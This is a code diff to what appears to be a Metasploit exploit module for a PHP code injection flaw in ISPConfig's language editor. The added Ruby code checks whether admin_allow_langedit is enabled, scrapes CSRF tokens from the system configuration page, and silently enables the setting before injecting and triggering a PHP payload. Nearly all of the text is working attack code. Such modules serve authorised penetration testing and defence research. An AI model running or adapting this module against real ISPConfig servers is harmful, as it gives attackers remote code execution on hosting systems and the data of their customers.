added: automatic admin_allow_langedit permission checking and enabling capability

Author: happybear-21

modules/exploits/linux/http/ispconfig_lang_edit_php_code_injection.rb

@@ -16,7 +16,18 @@ def initialize(info = {})
         info,
         'Name' => 'ISPConfig language_edit.php PHP Code Injection',
         'Description' => %q{
-          An issue was discovered in ISPConfig before 3.2.11p1. PHP code injection can be achieved in the language file editor by an admin if admin_allow_langedit is enabled.
+          This module exploits a PHP code injection vulnerability in ISPConfig's
+          language_edit.php file. The vulnerability occurs when the `admin_allow_langedit`
+          setting is enabled, allowing authenticated administrators to inject arbitrary
+          PHP code through the language editor interface.
+          
+          This module will automatically check if the required `admin_allow_langedit`
+          permission is enabled, and attempt to enable it if it's disabled (requires
+          admin credentials with system configuration access).
+          
+          The exploit works by injecting a PHP payload into a language file, which
+          is then executed when the file is accessed. The payload is base64 encoded
+          and written using PHP's file_put_contents function.
         },
         'License' => MSF_LICENSE,
         'Author' => [
@@ -139,6 +150,78 @@ def authenticate
     true
   end
 
+  def check_langedit_permission
+    print_status('Checking if admin_allow_langedit is enabled...')
+    
+    # Try to access the language editor to see if it's accessible
+    edit_url = normalize_uri(target_uri.path, 'admin', 'language_edit.php')
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => edit_url,
+      'keep_cookies' => true
+    })
+    
+    if res && res.code == 200 && res.body.include?('language_edit')
+      print_good('Language editor is accessible - admin_allow_langedit appears to be enabled')
+      return true
+    elsif res && res.code == 403
+      print_warning('Language editor access denied - admin_allow_langedit may be disabled')
+      return false
+    else
+      print_warning('Could not determine language editor accessibility')
+      return false
+    end
+  end
+
+  def enable_langedit_permission
+    print_status('Attempting to enable admin_allow_langedit...')
+    
+    # Try to access the system settings page
+    settings_url = normalize_uri(target_uri.path, 'admin', 'system_config.php')
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => settings_url,
+      'keep_cookies' => true
+    })
+    
+    unless res && res.code == 200
+      print_warning('Could not access system configuration page')
+      return false
+    end
+    
+    doc = res.get_html_document
+    csrf_id = doc.at('input[name="_csrf_id"]')&.[]('value')
+    csrf_key = doc.at('input[name="_csrf_key"]')&.[]('value')
+    
+    unless csrf_id && csrf_key
+      print_warning('Could not extract CSRF tokens from system config page')
+      return false
+    end
+    
+    # Try to enable the setting
+    enable_data = {
+      '_csrf_id' => csrf_id,
+      '_csrf_key' => csrf_key,
+      'admin_allow_langedit' => '1',
+      'action' => 'save'
+    }
+    
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => settings_url,
+      'vars_post' => enable_data,
+      'keep_cookies' => true
+    })
+    
+    if res && res.code == 200
+      print_good('Successfully enabled admin_allow_langedit')
+      return true
+    else
+      print_warning('Failed to enable admin_allow_langedit')
+      return false
+    end
+  end
+
   def inject_payload
     print_status('Injecting PHP payload...')
     @payload_file = "#{Rex::Text.rand_text_alpha_lower(8)}.php"
@@ -243,6 +326,23 @@ def cleanup
 
   def exploit
     authenticate
+    
+    # Check if language editor permissions are enabled
+    unless check_langedit_permission
+      print_warning('admin_allow_langedit appears to be disabled')
+      print_status('Attempting to enable admin_allow_langedit...')
+      
+      if enable_langedit_permission
+        print_good('Successfully enabled admin_allow_langedit, retrying exploit...')
+        # Re-check permissions after enabling
+        unless check_langedit_permission
+          fail_with(Failure::UnexpectedReply, 'Failed to enable admin_allow_langedit or language editor still not accessible')
+        end
+      else
+        fail_with(Failure::UnexpectedReply, 'Could not enable admin_allow_langedit - exploit requires this setting to be enabled')
+      end
+    end
+    
     payload_url = inject_payload
     print_status('Starting payload handler...')
     trigger_payload(payload_url)